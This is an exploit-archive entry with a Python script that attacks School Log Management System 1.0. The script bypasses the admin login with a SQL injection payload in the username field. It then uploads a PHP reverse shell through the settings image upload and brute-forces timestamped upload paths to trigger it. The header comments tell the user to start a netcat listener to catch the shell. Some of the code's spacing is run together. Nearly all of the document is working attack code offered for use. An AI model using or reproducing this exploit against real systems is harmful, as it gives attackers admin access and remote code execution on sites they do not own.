# Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution# Date: 4-11-2020# Exploit Author: mosaaed# Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip# Version: 1.0# Tested on: Parrot 5.5.17 + Apache 2.4.46# replace shell.php with your own php reverse shell# change [TARGET URL] to target URL or IP address# setup your netcat listener for sum good ol shellz#!/usr/bin/python3import requests
import time
defsqli_admin():
s = requests.Session()
data ={"username":"admin'or'1'=1#","password":"hacked"}
adminlogin ="http://localhost/slms/admin/ajax.php?action=save_settings"
s.post(adminlogin,data=data)return s
deftrigger_rce(session):
starttime =int(time.time())
multipart_form_data ={"name":("cyberscurity"),"email":("test@test.com"),"contact":("+11111111111"),"about":("Nothing much about it"),"img":("shell.php",open("shell.php","rb"))}
session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data)
get_shell(starttime-100,starttime+100,session)defget_shell(start,end,session):for i inrange(start,end):
session.get("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")
response = requests.get ("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")if response.status_code ==200:print("http://localhost/slms/admin/assets/uploads/"+str(i)+"_shell.php")defmain():
session = sqli_admin()
trigger_rce(session)if __name__ =='__main__':
main()
